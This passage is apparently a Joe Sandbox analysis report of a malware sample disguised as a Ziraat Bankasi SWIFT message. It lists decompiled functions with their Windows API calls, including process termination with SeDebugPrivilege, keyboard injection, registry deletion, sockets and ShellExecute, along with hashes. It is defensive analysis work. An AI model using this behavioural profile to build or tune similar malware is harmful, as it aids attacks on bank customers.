Part of subcall function 000E6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000E6554
Part of subcall function 000E6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 000E6564
Part of subcall function 000E6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 000E65F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0010179A
GetLastError.KERNEL32 ref: 001017AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 001017D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00101855
GetLastError.KERNEL32(00000000), ref: 00101860
CloseHandle.KERNEL32(00000000), ref: 00101895

Strings

SeDebugPrivilege, xrefs: 001017B8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 209a217822dda4a486874f98abbeff76867fb227ac2fe70a4ca3dad1e7074e9c
Instruction ID: 9aeea86144554093e945f380499344fd45f97e10c0f2913b22f1eede41371015
Opcode Fuzzy Hash: 209a217822dda4a486874f98abbeff76867fb227ac2fe70a4ca3dad1e7074e9c
Instruction Fuzzy Hash: FE41BE72600200AFDB15EF94C895FAEB7A5BF14300F058059F9069F3C3DBB9AA418B51

Function 0010E397 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00161628,00000000,00161628,00000000,00000000,00161628,?,0011DC5D,00000000,?,00000000,00000000,00000000,?,0011DAD1,00000004), ref: 0010E40B
EnableWindow.USER32(00000000,00000000), ref: 0010E42F
ShowWindow.USER32(00161628,00000000), ref: 0010E48F
ShowWindow.USER32(00000000,00000004), ref: 0010E4A1
EnableWindow.USER32(00000000,00000001), ref: 0010E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0010E4E8

Strings

@U=u, xrefs: 0010E4E8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: @U=u
API String ID: 642888154-2594219639
Opcode ID: bf5e232805f509a8dc43dbef1eacf00d4638564aa8482b264e776c2a5eed1745
Instruction ID: bf8956e9ae8f634e8aeb93e49c4d440ccd2f3820709bf944ade6f153ff9c1da6
Opcode Fuzzy Hash: bf5e232805f509a8dc43dbef1eacf00d4638564aa8482b264e776c2a5eed1745
Instruction Fuzzy Hash: 5B415E34601144EFDB26CF25D499B947BE1FF09304F1885B9EA98CF6E2C7B1A852CB51

Function 000E5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 000E58B8

Strings

info, xrefs: 000E5859
question, xrefs: 000E5871
stop, xrefs: 000E5889
warning, xrefs: 000E58A1
blank, xrefs: 000E583A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: fdd128cdbcde48205e24a9d21dd8cffba2a82129d8f50869318c22b724177db3
Instruction ID: b3e217409b42ab4661ab8ab0bab7b37803acfb5e072fa02a73673d7af5b4c2ca
Opcode Fuzzy Hash: fdd128cdbcde48205e24a9d21dd8cffba2a82129d8f50869318c22b724177db3
Instruction Fuzzy Hash: 1F113D35309782FEE7145B559C92DAE33DC9F15359B30043EF950F66C2EB60AB418264

Function 000EA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 000EA806

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 230bc79eaa15c8bbcdbb65f774091ecb4d5be4c4b7ac8da6f890a4abe38c31be
Instruction ID: c6e0e15ce095742d613b4541c3d42ba4786f3147300b5583a9a9ce3c9c567ae7
Opcode Fuzzy Hash: 230bc79eaa15c8bbcdbb65f774091ecb4d5be4c4b7ac8da6f890a4abe38c31be
Instruction Fuzzy Hash: B4C17B75A0425ADFDB14DF99D881BEEB7F4EF0E310F24406AE605E7241D734AA41CBA2

Function 000E6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 000E6B63
LoadStringW.USER32(00000000), ref: 000E6B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000E6B80
LoadStringW.USER32(00000000), ref: 000E6B87
_wprintf.LIBCMT ref: 000E6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000E6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 000E6BA8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 6a52a431d2d621a2b9aa8b3eb149cef9a6112457930e305921aa5de11d7558e6
Instruction ID: 9d95aaf2d634cc67cf6e504b488ec251a774efab59eb136c443181db8455a4db
Opcode Fuzzy Hash: 6a52a431d2d621a2b9aa8b3eb149cef9a6112457930e305921aa5de11d7558e6
Instruction Fuzzy Hash: BB0162F2500208BFE721A790ED89EEA366CD704344F004495B746E2441EA74DED58B71

Function 00102B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00103C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00102BB5,?,?), ref: 00103C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00102BF6

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 26df7b30567c6dc2be63f69f973e47108cac84ea34a8435cca34ec82a633c6e6
Instruction ID: 85cb2c15cf89ea3ea7e344af0abe5d68987e9efbdd06100b9227caecacc75606
Opcode Fuzzy Hash: 26df7b30567c6dc2be63f69f973e47108cac84ea34a8435cca34ec82a633c6e6
Instruction Fuzzy Hash: E0916971204201AFDB14EF94C895FAEB7E5BF98310F04881DF9969B2A2DB71ED45CB42

Function 000F95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 000F9691
WSAGetLastError.WSOCK32(00000000), ref: 000F969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 000F96C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000F96E9
WSAGetLastError.WSOCK32(00000000), ref: 000F96F8
htons.WSOCK32(?,?,?,00000000,?), ref: 000F97AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0013DC00), ref: 000F9765

Part of subcall function 000DD2FF: _strlen.LIBCMT ref: 000DD309

_strlen.LIBCMT ref: 000F9800

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: 52179a10c04dc6a152947989f80ddb4d57b26318f83428380146b92ca2a59806
Instruction ID: e6c2e750165af594f2a4d05b82dde20efd1f4e7c04f19825ea9c3977982f38a7
Opcode Fuzzy Hash: 52179a10c04dc6a152947989f80ddb4d57b26318f83428380146b92ca2a59806
Instruction Fuzzy Hash: 3581BE31504240ABD724EFA4DC85FAFB7E8EF85714F10461DF6569B292EB30D905CBA2

Function 000CA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 000CA991

Part of subcall function 000C7D7C: __FF_MSGBANNER.LIBCMT ref: 000C7D91
Part of subcall function 000C7D7C: __NMSG_WRITE.LIBCMT ref: 000C7D98
Part of subcall function 000C7D7C: __malloc_crt.LIBCMT ref: 000C7DB8

__lock.LIBCMT ref: 000CA9A4
__lock.LIBCMT ref: 000CA9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00156DE0,00000018,000D5E7B,?,00000000,00000109), ref: 000CAA0C
EnterCriticalSection.KERNEL32(8000000C,00156DE0,00000018,000D5E7B,?,00000000,00000109), ref: 000CAA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 000CAA39

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 50d80830cd262e049a8ba9429339478403055a3be83254ddcfb303b48ba9a6bd
Instruction ID: 8dcd35df1353df02915f2a2d0802dee3041d79e5ac90de59f1697148c2dd4484
Opcode Fuzzy Hash: 50d80830cd262e049a8ba9429339478403055a3be83254ddcfb303b48ba9a6bd
Instruction Fuzzy Hash: 7E412971B016099BEB249F68DE45B9DB7B0AF0633DF11421CE429AB1D2D7B49C41CB92

Function 000F16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

Part of subcall function 000BC6F4: _wcscpy.LIBCMT ref: 000BC717

_wcstok.LIBCMT ref: 000F184E
_wcscpy.LIBCMT ref: 000F18DD
_memset.LIBCMT ref: 000F1910

Strings

X, xrefs: 000F1948

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: f660f30d877d41f33f99f8bacacf37d41eaae8d75828efa81b99091d5641515e
Instruction ID: d21c5473b50fd41ae6a044552422c2b8e77a4ec8032e47daa72843078b2a1180
Opcode Fuzzy Hash: f660f30d877d41f33f99f8bacacf37d41eaae8d75828efa81b99091d5641515e
Instruction Fuzzy Hash: 59C16D31508340DFD764EF64C981AAEB7E0BF96350F04492DF99A976A2DB70ED05CB82

Function 000BAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817790865e5fb86e1e10d0ebd920f59db0a477e8eb3cb6afccbd106207ae57ad
Instruction ID: 66fa075d737063a8eb035f1c3e53b9e6baa3a32e67288d28bee958a4ba6cf12d
Opcode Fuzzy Hash: 817790865e5fb86e1e10d0ebd920f59db0a477e8eb3cb6afccbd106207ae57ad
Instruction Fuzzy Hash: D9714BB1A0010AFFCB14CF98CC89AFEBBB5FF86314F248159F915A6251C734AA51CB65

Function 00102230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0010225A
_memset.LIBCMT ref: 00102323
ShellExecuteExW.SHELL32(?), ref: 00102368

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

Part of subcall function 000BC6F4: _wcscpy.LIBCMT ref: 000BC717

CloseHandle.KERNEL32(00000000), ref: 0010242F
FreeLibrary.KERNEL32(00000000), ref: 0010243E

Strings

@, xrefs: 00102334

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 85f58783995278e8231727633a5d7199f912ad5bf13ced70b1d86a17a4dd7e3e
Instruction ID: c248ee506b7acb2c144bde73ff99ae7d79f68d0719324174c6b1c79ea0b0ab61
Opcode Fuzzy Hash: 85f58783995278e8231727633a5d7199f912ad5bf13ced70b1d86a17a4dd7e3e
Instruction Fuzzy Hash: 57715C71A006199FCF15EF94D8959EEBBB5FF48310F108459E856AB392CB74AD40CB90

Function 0010E062 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0010E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 0010E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 0010E248
GetWindowLongW.USER32(?,000000EC), ref: 0010E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0010E281

Strings

@U=u, xrefs: 0010E1D5, 0010E20D, 0010E281

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID: @U=u
API String ID: 3188977179-2594219639
Opcode ID: 88b10ac12c67f187b77568188ae4b6601463a80a8359af9a0828166d8cea8e55
Instruction ID: d9b25b06489691e5951c627356e2d4e9e0952b673d14746654566a063bbc8fde
Opcode Fuzzy Hash: 88b10ac12c67f187b77568188ae4b6601463a80a8359af9a0828166d8cea8e55
Instruction Fuzzy Hash: D5617D38A04204AFDB249F59CC94FEA77FAEB49300F194859F999972E1C7F1A950CB10

Function 000E3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 000E3DE7
GetKeyboardState.USER32(?), ref: 000E3DFC
SetKeyboardState.USER32(?), ref: 000E3E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 000E3E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 000E3EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 000E3EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 000E3F13

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e628435c50da3a3c5f87630d0fdd19851242db189b705bea567aa49eb0fd7af5
Instruction ID: 84490b982c4271190e7e07ededba838914968165d32119263844694a343a2e45
Opcode Fuzzy Hash: e628435c50da3a3c5f87630d0fdd19851242db189b705bea567aa49eb0fd7af5
Instruction Fuzzy Hash: 1D51D2A0A087D53DFB364335CC49BBA7EE95B06304F088589E1D5679C3D3A9AEC4D760

Function 000E3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 000E3C02
GetKeyboardState.USER32(?), ref: 000E3C17
SetKeyboardState.USER32(?), ref: 000E3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000E3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000E3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000E3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000E3D26

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7fa3982e98d5f8fcde126a5206684f4636f81eefffa46d820184d884d13325e2
Instruction ID: baefdfe08cbde1ebf9c7ede30cc09b1d791f20aa97d8f5a855ccc5fef46c4837
Opcode Fuzzy Hash: 7fa3982e98d5f8fcde126a5206684f4636f81eefffa46d820184d884d13325e2
Instruction Fuzzy Hash: 5951D6A05087D53DFB3683368C59BB6BEE95B06300F088489E1D57B8C3D695EE94D750

Function 0010CCF7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

@U=u, xrefs: 0010CDF0

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: 4e969d930e0f855eb7da5a1f3f7c4a69032b4efc8b6d85d1c8ed01b9094c99f6
Instruction ID: d66d6f716e07df101ac5a4aa0ce782270d05610c398c7ecb9ce2ca12473ad6e5
Opcode Fuzzy Hash: 4e969d930e0f855eb7da5a1f3f7c4a69032b4efc8b6d85d1c8ed01b9094c99f6
Instruction Fuzzy Hash: 5541B039900205BFD724DBA8CC48FA9BF69EB09310F154365F899A72E1D7B0AD519FD0

Function 00103D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00103DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00103DCB
FreeLibrary.KERNEL32(00000000), ref: 00103E80

Part of subcall function 00103D72: RegCloseKey.ADVAPI32(?), ref: 00103DE8
Part of subcall function 00103D72: FreeLibrary.KERNEL32(?), ref: 00103E3A
Part of subcall function 00103D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00103E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00103E25

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 6bab0d4559fe461816c2332b0f0ed6a0ee779496c565018c892cd6aeec34a33c
Instruction ID: e2d17043ba7107639f60d34b05ab0f843e07b09092255337a4e3901dc5d4fac1
Opcode Fuzzy Hash: 6bab0d4559fe461816c2332b0f0ed6a0ee779496c565018c892cd6aeec34a33c
Instruction Fuzzy Hash: B431CDB1911109BFDB159B94DC89EFFB7BCEF08300F10016AE562E2590D7B49F899B60

Function 000E08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000E08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000E0918
SysAllocString.OLEAUT32(00000000), ref: 000E091B
SysAllocString.OLEAUT32(?), ref: 000E0939
SysFreeString.OLEAUT32(?), ref: 000E0942
StringFromGUID2.OLE32(?,?,00000028), ref: 000E0967
SysAllocString.OLEAUT32(?), ref: 000E0975

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
